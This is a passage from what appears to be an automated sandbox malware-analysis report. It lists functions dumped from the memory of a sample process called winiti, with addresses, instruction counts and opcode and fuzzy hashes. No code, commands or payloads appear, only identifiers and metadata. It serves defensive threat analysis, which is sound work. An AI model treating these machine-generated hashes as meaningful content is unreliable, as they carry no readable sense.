Opcode Fuzzy Hash: ba34ecf4ee323d32014f91ec897cc63be0be7a2a8461733a353095925ef49be6
Instruction Fuzzy Hash: E7218431E142169BDB18CFA4D4406AEF7B6BF89310F20866BE815FB390EB75AC41CB50

Function 002D1718 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87eb34e8aca7bd02905efce1000cfe2e0f3a2b47972f0eed048200f457b0106a
Instruction ID: 222fbd6999e594a4b554b2886d08cb4fa8c55bf69716f9c4fccb7c8b464c7cbd
Opcode Fuzzy Hash: 87eb34e8aca7bd02905efce1000cfe2e0f3a2b47972f0eed048200f457b0106a
Instruction Fuzzy Hash: A2215C34B10205EFEB14EF68D5147AEB7F6AF89345F20046AD406EB7A0DB358C61CBA1

Function 007210B4 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dec151c1f96bd078b377ea94fdcdeb2748bdf4be86e9fbaab496adf499e1a15
Instruction ID: e40f97c64dffc84d2ed43fd2aea35f928ada5b40307c70e82944db9be0890081
Opcode Fuzzy Hash: 0dec151c1f96bd078b377ea94fdcdeb2748bdf4be86e9fbaab496adf499e1a15
Instruction Fuzzy Hash: 2E219D30B002289BDF18EA69F9546AEB7F7FB94310FA08429E505EB345DB35ED458B80

Function 002D1540 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3984261abf6970e172fc0368e73a6c0f5a2be9589f0061a6f43b81045698d6cd
Instruction ID: a3b3d62873d12366811b7b73c3f8369a2696320e3cc6acedb19de09663f7c5e1
Opcode Fuzzy Hash: 3984261abf6970e172fc0368e73a6c0f5a2be9589f0061a6f43b81045698d6cd
Instruction Fuzzy Hash: 8021E774620206AFDB22EF28F88876D3769EF88315F908D26D106C775CD638DDA58BD1

Function 002D4E20 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4aa6135820b6ff809b355f894245c3bd38592a8f8b6a435b8d73e6f8cefe38
Instruction ID: ab9608209541f7cb979ce406d0507e9b5fa122b3c9a5bc0f0500b0ae92d59f8e
Opcode Fuzzy Hash: af4aa6135820b6ff809b355f894245c3bd38592a8f8b6a435b8d73e6f8cefe38
Instruction Fuzzy Hash: 5A210334A10205DFDB14EB78E958BAE77F2BB8C305B104469E906EB3A0DB319D118B65

Function 002D1709 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0cf34d526523fa778f163abadf78d8fbef5bf1bbb25e8ed3b24d42dff9257e
Instruction ID: 5387084165da48ce2e7b5b04a64fbe535ef9ddc4ec0dbf46d5f77d6c6f26f88f
Opcode Fuzzy Hash: fd0cf34d526523fa778f163abadf78d8fbef5bf1bbb25e8ed3b24d42dff9257e
Instruction Fuzzy Hash: 6E215E34B14206EFEB14EF74DA142ADB7F1AF49345F20046AD406EB7A0DB398C61CB61

Function 007219D2 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb9f14015d42353b8eb9540befea1f3344a71b57d51d47918e1ddef9fe68ce0
Instruction ID: 88a949c32d03e718b59008e29c2b86d33bc0404d9db317a296d747c4d88492bc
Opcode Fuzzy Hash: 8cb9f14015d42353b8eb9540befea1f3344a71b57d51d47918e1ddef9fe68ce0
Instruction Fuzzy Hash: 5E21C234A11219CBCF10DF94E588AAEBBB2FF58305F688156D801A7255DB34ED82CF50

Function 00729A10 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d94ab58ef83e3a46a57192627138fc8ea3f541750ee51e880932a5443e4557ba
Instruction ID: 06139487d66e7b0f3b61f224dd6f3df68e01026daa507e9ad374bc7e7524c4ad
Opcode Fuzzy Hash: d94ab58ef83e3a46a57192627138fc8ea3f541750ee51e880932a5443e4557ba
Instruction Fuzzy Hash: 6521F7B1D012199FCB50CF99D884BDEFBF4FB48710F14806AE818AB255D3749A44CBA4

Function 002D0848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16513c8f0854be080945104bcd1196f562446d4b623f4f8a07d41c0fc1cddcfe
Instruction ID: 8ef2e6e559bd8315646133e79bfc2cbaec4b6633fe9b5b94470c234f7bc9c31f
Opcode Fuzzy Hash: 16513c8f0854be080945104bcd1196f562446d4b623f4f8a07d41c0fc1cddcfe
Instruction Fuzzy Hash: 2411A330B202058FDF259E78D4947AA3391EF95310F20893AE006CF361DE61CD559BD1

Function 002D0838 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c9bdfa6c8428a7f03f08f0b45cfdf999bdb6394c303cdd455547822b66d436
Instruction ID: 6352d19003996e69049d4b7f1eadb1df366ac0d83464030b2b6200cbcf25bcdd
Opcode Fuzzy Hash: f4c9bdfa6c8428a7f03f08f0b45cfdf999bdb6394c303cdd455547822b66d436
Instruction Fuzzy Hash: D611A330B243064FEF265A74D4903AE3761EF92310F65497BE006DB3A2EA61CD559BD2

Function 002D5C17 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2425041bdf0a0d9f91a5bad125be0e8e53df7cbd2dd52788692c1165cef3a8c1
Instruction ID: b490b35c846d8ec29227f91453a52dc2ce942ca9ecd271e5eafb62f0472e3e00
Opcode Fuzzy Hash: 2425041bdf0a0d9f91a5bad125be0e8e53df7cbd2dd52788692c1165cef3a8c1
Instruction Fuzzy Hash: 3521F0B1D10259AFCB00CF9AD984ADEFFB4FF48314F20816AE918A7311C374A954CBA5

Function 002DFEB8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34b1f080593759e857149e94ad9494550464b2bd8c9a89d4c3e81cfbcca3b2ea
Instruction ID: be935f3fa4b2a90b31807c654576bddf26e29fa65eeb386242d9ca5222425d59
Opcode Fuzzy Hash: 34b1f080593759e857149e94ad9494550464b2bd8c9a89d4c3e81cfbcca3b2ea
Instruction Fuzzy Hash: A911A536B101198FCFA89B68D9146AE73EBABC9710F108536D40BE7354DE75DC018794

Function 002DFB70 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f9d1c6bdd847d688fae8438791842378684f1e901c6151942d30e567a72c2b
Instruction ID: 2a015c775e5b97be8e440e0bf2820b700dfbadf7455a3937b84e2441f01378f7
Opcode Fuzzy Hash: d7f9d1c6bdd847d688fae8438791842378684f1e901c6151942d30e567a72c2b
Instruction Fuzzy Hash: 6D21B2B5D112199FCB00CF99D984ADEFFB4FB49350F20852AE918A7700C374A954CFA5

Function 002D5C24 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce5bde3fa918d0726b44cb2eda3993574a76096a6b80f00377aa89362e31bb61
Instruction ID: 7efe7d852478a9d6aab4fdad9cf81710aca74b2c5124724a121fb611cb015d5c
Opcode Fuzzy Hash: ce5bde3fa918d0726b44cb2eda3993574a76096a6b80f00377aa89362e31bb61
Instruction Fuzzy Hash: 2D21C2B1D10259AFCB00CF9AD984ADEFFB4FB49310F60852AE918B7340D374A954CBA5

Function 002D1658 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47bc96b88e3c611aa64178ea63336f01cfdce493697b829afd8e1a4411d0bc9
Instruction ID: e00e7b4f4e3e1ac693b21019c75da26383dfad43291af15890817b8e3da55320
Opcode Fuzzy Hash: f47bc96b88e3c611aa64178ea63336f01cfdce493697b829afd8e1a4411d0bc9
Instruction Fuzzy Hash: 5B11A175B10211AFCF10AB78A80866E7BE9EB8C250F14482AE906D3754EA35C9618B81

Function 007201A7 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d7ff59308097477a09d343b36511b334d3b918e1ba0b45120e160604e0547c
Instruction ID: 4f05d8906b0b22439e77194714aabd157b21e241214822ef88d5d7b3a2ba6cf8
Opcode Fuzzy Hash: a2d7ff59308097477a09d343b36511b334d3b918e1ba0b45120e160604e0547c
Instruction Fuzzy Hash: E701BC31B001604FEB25A66CA424B2E67DBDBE9710F10883AF00BCB385DE69DC4283A1

Function 002DFEA8 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3a3c7b180554af3280e68911e2188073f0b1fd252ff21dc7cb6e3e6188dba33
Instruction ID: b10a87ef74696dd8a05144db4a2a40bd7c663812761b63444af6c155b076a21b
Opcode Fuzzy Hash: d3a3c7b180554af3280e68911e2188073f0b1fd252ff21dc7cb6e3e6188dba33
Instruction Fuzzy Hash: 1401B132B201158FDFA89B689D246FE77AA9BC9700F00413AD407D7384DE218D068791

Function 002D14A0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 251e7d09d14b10155a38e5e4c0da67a5483fd450627714c12b214fbb5a613bf3
Instruction ID: 721f3521b3dfba82ed993b9559944631adfc902bd4481b467ff09dec5ea058b1
Opcode Fuzzy Hash: 251e7d09d14b10155a38e5e4c0da67a5483fd450627714c12b214fbb5a613bf3
Instruction Fuzzy Hash: 56018031F102169BCF21EFB884452AE7BF5EF88350B24447BD405E7701EA35CC618BA1

Function 0019D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.713974306.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_19d000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction ID: c304366a257fc2d2bc8c153422ded2ceb55475e8d098896b5147d67f95c8fa82
Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction Fuzzy Hash: 6A119D75504280DFDB12CF14E9C4B15FFA1FB84314F28C6AEE8494B656C33AD84ACBA2

Function 0072917F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1ce23ff75dc04f2416937e06894d6e2fe1d2ff824d475e5fb2ffd601a8be73c
Instruction ID: 5119343ea9975a17a66914ca448a722b5ec78c90eed53a2d15b78af138d4c79f
Opcode Fuzzy Hash: f1ce23ff75dc04f2416937e06894d6e2fe1d2ff824d475e5fb2ffd601a8be73c
Instruction Fuzzy Hash: AF01F7317042155FDB25967CA89477E77D6EBD6710F14883EF54EC7340EA19DD024392

Function 007201B8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc13bd0927d2599bb1972320a0679229569c93f4f49723f2bebff6ae2b7351b
Instruction ID: 469e9c07f3c4c0ec3f11cd3a2d3fa2b2ac2c55800be476111caf0eff7da43c25
Opcode Fuzzy Hash: 5cc13bd0927d2599bb1972320a0679229569c93f4f49723f2bebff6ae2b7351b
Instruction Fuzzy Hash: 020181317001244BDB64A6ADA454B2FB2DAEBD9760F10883AF50ECB385DE69DC4243E5

Function 007246D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3dd6c42c9d52cfe63ad2905c6bd2fcce7154f4d9c3f2a03e1641fc1f167cc0d
Instruction ID: 450ccb305f174c16383588b17d3e9ca8aa759503d70ab6fe2ca87138608d4eda
Opcode Fuzzy Hash: d3dd6c42c9d52cfe63ad2905c6bd2fcce7154f4d9c3f2a03e1641fc1f167cc0d
Instruction Fuzzy Hash: EC01DF307042604FDB21A638F85872A37E6EF96700F20846EE01ACB385DB2ACC028784

Function 002D8978 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5208bc58cde52f1a798494a53664ffa15350286245cd87ad78cdbd7b38ba63ca
Instruction ID: e88e94f21e07338be2f62376296df0d8a611d7d5a106039e235fd59cd5f8c0c5
Opcode Fuzzy Hash: 5208bc58cde52f1a798494a53664ffa15350286245cd87ad78cdbd7b38ba63ca
Instruction Fuzzy Hash: 49010431A102448FCB14DF68D88179EBB72EFC0310F64C566C8481B38ADB74DD06CB90

Function 00729190 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936fbd3308605e5f0c8b8666958410499d763bb8300bece1bd9ff51529661795
Instruction ID: 4ecbbcb4d62585c475c7677e93b110379c984b429c77fa9985a410ca5e263068
Opcode Fuzzy Hash: 936fbd3308605e5f0c8b8666958410499d763bb8300bece1bd9ff51529661795
Instruction Fuzzy Hash: 2D01AF317001295BEB65967DA894B2F73DAEBD9B20F14883EF60BC7344EE29DC424395

Function 007246E0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9745fc7d7116d3e9fd7aad2d6ff000f7cb1ff30a7373847a93c78803cce527ca
Instruction ID: 9eb3403a7f6ad95cb84c382a746aa26618097bf734f3a0a92cfca50d8d3df897
Opcode Fuzzy Hash: 9745fc7d7116d3e9fd7aad2d6ff000f7cb1ff30a7373847a93c78803cce527ca
Instruction Fuzzy Hash: 1C0131347002245BDB24E678F954B2A73DAEB96714F108828F51ACB384DF36DC418784

Function 0072109F Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 499af4224c0fb98e91c7287df737222f170373fa86b244ad41fba4e0e5ca8c0f
Instruction ID: 9a7599edc261823a456e56f87bc95d7d1ad3e54baf682b1e5ffcbafa652172df
Opcode Fuzzy Hash: 499af4224c0fb98e91c7287df737222f170373fa86b244ad41fba4e0e5ca8c0f
Instruction Fuzzy Hash: FE018C30B005298BDF44DA99F5447ADF3B3FFA4320FA58061D908EB241D738ED908B80

Function 002D6DD1 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26d12574ccf782d1fb6cbea261c63f37d40992853540f9ce4425b611eb9f3d99
Instruction ID: 496a7910ed0fe69d37195cea183d6e1033f52df0e91465b87b0fd15a39eb5404
Opcode Fuzzy Hash: 26d12574ccf782d1fb6cbea261c63f37d40992853540f9ce4425b611eb9f3d99
Instruction Fuzzy Hash: DE01DF30500388AFCB46FBB4F4866AC7BB0EF40300B5089A9D5049B159EF31AF0A8B81

Function 0072A70D Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11716b87fe79979042d8309928c542b4df420d8fd1be5b873a7e11e4543d2ff6
Instruction ID: f9ab670569f866bd10a68240e6e615ed035ca1a2c86fe103afe179ae4caeb19e
Opcode Fuzzy Hash: 11716b87fe79979042d8309928c542b4df420d8fd1be5b873a7e11e4543d2ff6
Instruction Fuzzy Hash: 3BF08C35B001189BDB00DBA8EC50BDEB7F1EBC8322F1482A5E519A7394C634DA118BA4

Function 002D5D58 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766fd89495117529565c8d99f72d202edb8d364423a9c773f71d1c987456645d
Instruction ID: 284ed2a09bab7268b660d01af772563e117b2b516cf476c09e8262ff44b06713
Opcode Fuzzy Hash: 766fd89495117529565c8d99f72d202edb8d364423a9c773f71d1c987456645d
Instruction Fuzzy Hash: CE012839B00618CFDB14DB78D95CBAC37B2EF89715F1440A9E5068B3A4CB71AD82CB40

Function 002D6DE0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9accdc27f433c0cc31d6f0232a923acf9a8ed6521d0cec41a4467250f3b4586f
Instruction ID: 42876f5b6bdc96f1d666a368de977d15d36cc8ff1759b4fffcf04fd8d2e4d71e
Opcode Fuzzy Hash: 9accdc27f433c0cc31d6f0232a923acf9a8ed6521d0cec41a4467250f3b4586f
Instruction Fuzzy Hash: 58F0317091034DAFCB45FBA4F58669D77B5EF44304B908968D50597259DF31AF098B80

Function 00726BB8 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12b54da6784363888d88036fb6ac0432a644d869c4fd80ba710600600290622e
Instruction ID: 40d640980685324c1ff7c4254848841d2506a4e741fb6419b8df828d6222b34a
Opcode Fuzzy Hash: 12b54da6784363888d88036fb6ac0432a644d869c4fd80ba710600600290622e
Instruction Fuzzy Hash: B1F0A032B2123897CB146965F804A9AB37AEB85760F10442AED05A7344EB75AD108BD0

Function 0072A808 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d2be532cbcca0035191f43e1f071a628f670781cf751e368e5910769ad8a3ea
Instruction ID: 303be4f33e0b49b68b8d1cd14b6588e5537aa99726b59bbe616e67ea261e8dd7
Opcode Fuzzy Hash: 6d2be532cbcca0035191f43e1f071a628f670781cf751e368e5910769ad8a3ea
Instruction Fuzzy Hash: F7F08C71E1022A9FCB91DFB898051EE7BF4FB89310B01847AE809E2200E2358A118B82

Function 00729D89 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 219a94a5e52064a46f46c1163d4ea848916ba083a98692dbdfdbe2db8d3a106a
Instruction ID: c6cf125f84c768e3cd10f36fcd1231d2b407e9a5d7bac8100178b77f571b544b
Opcode Fuzzy Hash: 219a94a5e52064a46f46c1163d4ea848916ba083a98692dbdfdbe2db8d3a106a
Instruction Fuzzy Hash: B9E026382143284FEB626B38F48A2697BE4EF03320F184876E405C7281C32ADC418B12

Function 0072A818 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feb055d011af5281fc083f6f3c5e4cff31196403e409be120b2e1f5ac49486fe
Instruction ID: ff1926753df97f48c74cbc76caa84102b1e097a14bfe10d7c75db14774b56513
Opcode Fuzzy Hash: feb055d011af5281fc083f6f3c5e4cff31196403e409be120b2e1f5ac49486fe
Instruction Fuzzy Hash: 41E04871D00125AF8F50DF7958042AE77F9FB45350F108476DD09E3200F634CA118BD2

Function 0072C4B3 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce3b1bd76dfd4d0689c13b7c3d11c5454039d1ac144a04ac443751b6ab8894b
Instruction ID: 404ac61bcd4e0d484def61ee33fb009bd80c017f0f155dc7ce49f9fa80134599
Opcode Fuzzy Hash: 5ce3b1bd76dfd4d0689c13b7c3d11c5454039d1ac144a04ac443751b6ab8894b
Instruction Fuzzy Hash: FAE02B32B40135CB1E117294B4611FD7356F7E83643208563E606C7309DF36DD2247C1

Function 0072A490 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6b72a3ad50cf0f30504d0843f5d49e1600a85dc9365aba75cfac8bd09342863
Instruction ID: d0f505c3087d1fa06df42746c0ac25a88745e48f83e56664c6fa98d83fbf1d47
Opcode Fuzzy Hash: f6b72a3ad50cf0f30504d0843f5d49e1600a85dc9365aba75cfac8bd09342863
Instruction Fuzzy Hash: 87E0C231B002329B4A107298B4900EC7351E7883287108976E605C7306DA7ACD1207C2

Function 00729D07 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9814a50ba40bddadcb53dff3129dffe5f6fa22e86896d10596eda7c56de80950
Instruction ID: 363b11e3dfd71c61e2f93902536737eba2c1f05d3e7ebc9789a3de9d43045b1e
Opcode Fuzzy Hash: 9814a50ba40bddadcb53dff3129dffe5f6fa22e86896d10596eda7c56de80950
Instruction Fuzzy Hash: A8D05E36B002088FDF005BB8FD0D09CB7A1FB84311B00402AE90687650CB320A518B40

Non-executed Functions

Function 00721A48 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$p, xrefs: 00721F94
$p, xrefs: 00721FB6
$p, xrefs: 00721FAA
$p, xrefs: 00721F01
$p, xrefs: 00721B44
$p, xrefs: 00721EF5
$p, xrefs: 00721FA0
$p, xrefs: 00721B38
$p, xrefs: 00721B69
$p, xrefs: 00721B75

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p$$p$$p$$p$$p
API String ID: 0-1868313790
Opcode ID: d7394ddffd764e9158cf75e3b8fb242b93cdcee77747aabfd980cf3b5d2bef69
Instruction ID: b038aa09fdc2530513cb5332230deece1cbd9d8e1e99e9c4ce964a0148d56f3b
Opcode Fuzzy Hash: d7394ddffd764e9158cf75e3b8fb242b93cdcee77747aabfd980cf3b5d2bef69
Instruction Fuzzy Hash: 61124E30A01229DFDB28DF65D854BAEB7B2BF85300F60856AD409AB365DB35DD86CF40

Function 00724D08 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$p, xrefs: 00724E0A
